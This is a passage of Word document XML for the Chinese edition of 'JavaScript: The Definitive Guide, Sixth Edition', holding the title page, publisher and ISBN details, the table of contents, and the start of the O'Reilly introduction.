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0880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>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30" name="cover.jpg" descr="封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封面"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7772400" cy="10058400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para20"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="Top_of_part0000_html"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>精品图书系列</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>权威指南</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para16"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>版</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para16"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript: The Definitive Guide, Sixth Edition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para16"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:t>美</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t>弗兰纳根（</w:t>
      </w:r>
      <w:r>
        <w:t>Flanagan, D.</w:t>
      </w:r>
      <w:r>
        <w:t>）　著</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para16"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>淘宝前端团队　译</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para21"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>ISBN</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>978-7-111-37661-3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para18"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>本书纸版由机械工业出版社于</w:t>
      </w:r>
      <w:r>
        <w:t>2012</w:t>
      </w:r>
      <w:r>
        <w:t>年出版，电子版由华章分社（北京华章图文信息有限公司）全球范围内制作与发行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para18"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>版权所有，侵权必究</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para14"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>客服热线：</w:t>
      </w:r>
      <w:r>
        <w:t>+ 86-10-68995265</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para14"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>客服信箱：</w:t>
      </w:r>
      <w:r>
        <w:t>service@bbbvip.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para14"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>官方网址：</w:t>
      </w:r>
      <w:r>
        <w:t>www.hzmedia.com.cn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para14"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>新浪微博</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> @</w:t>
      </w:r>
      <w:r>
        <w:t>研发书局</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para14"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>腾讯微博</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> @yanfabook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para19"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="Mu__Lu_____________O_Reilly_Media_Inc_Ji"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>目　录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para13"/>
      </w:pPr>
      <w:r>
        <w:t>O'Reilly Media,Inc.</w:t>
      </w:r>
      <w:r>
        <w:t>介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>业界评论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para13"/>
      </w:pPr>
      <w:r>
        <w:t>译者序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para13"/>
      </w:pPr>
      <w:r>
        <w:t>前言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>关于盗版</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>本书约定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>示例代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>勘误表以及如何联系我们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>致谢</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para13"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>概述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para13"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">第一部分　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>章　词法结构</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>章　类型、值和变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>章　表达式和运算符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>章　语句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章　对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>章　数组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章　函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章　类和模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章　正则表达式的模式匹配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的子集和扩展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>章　服务器端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para13"/>
      </w:pPr>
      <w:r>
        <w:t>第二部分　客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章　脚本化文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>章　脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章　事件处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章　脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>章　客户端存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>章　多媒体和图形编程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5 API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para13"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">第三部分　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>核心参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>核心参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para13"/>
      </w:pPr>
      <w:r>
        <w:t>第四部分　客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para09"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para13"/>
      </w:pPr>
      <w:r>
        <w:t>作者介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para13"/>
      </w:pPr>
      <w:r>
        <w:t>封面介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para13"/>
      </w:pPr>
      <w:r>
        <w:t>译者简介</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="0Text"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="O_Reilly_Media_Inc_Jie_Shao_____O_Reilly"/>
      <w:bookmarkStart w:id="3" w:name="O_Reilly_Media_Inc_Jie_Shao_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>O'Reilly Media,Inc.</w:t>
      </w:r>
      <w:r>
        <w:t>介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O'Reilly </w:t>
      </w:r>
      <w:r>
        <w:t>Media</w:t>
      </w:r>
      <w:r>
        <w:t>通过图书、杂志、在线服务、调查研究和会议等方式传播创新知识。自</w:t>
      </w:r>
      <w:r>
        <w:t>1978</w:t>
      </w:r>
      <w:r>
        <w:t>年开始，</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>一直都是前沿发展的见证者和推动者。超级极客们正在开创着未来，而我们关注真正重要的技术趋势</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>通过放大那些</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>细微的信号</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>来刺激社会对新科技的应用。作为技术社区中活跃的参与者，</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>的发展充满了对创新的倡导、创造和发扬光大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>为软件开发人员带来革命性的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>动物书</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>；创建第一个商业网站（</w:t>
      </w:r>
      <w:r>
        <w:t>GNN</w:t>
      </w:r>
      <w:r>
        <w:t>）；组织了影响深远的开放源代码峰会，以至于开源软件运动以此命名；创立了</w:t>
      </w:r>
      <w:r>
        <w:t>Make</w:t>
      </w:r>
      <w:r>
        <w:t>杂志，从而成为</w:t>
      </w:r>
      <w:r>
        <w:t>DI</w:t>
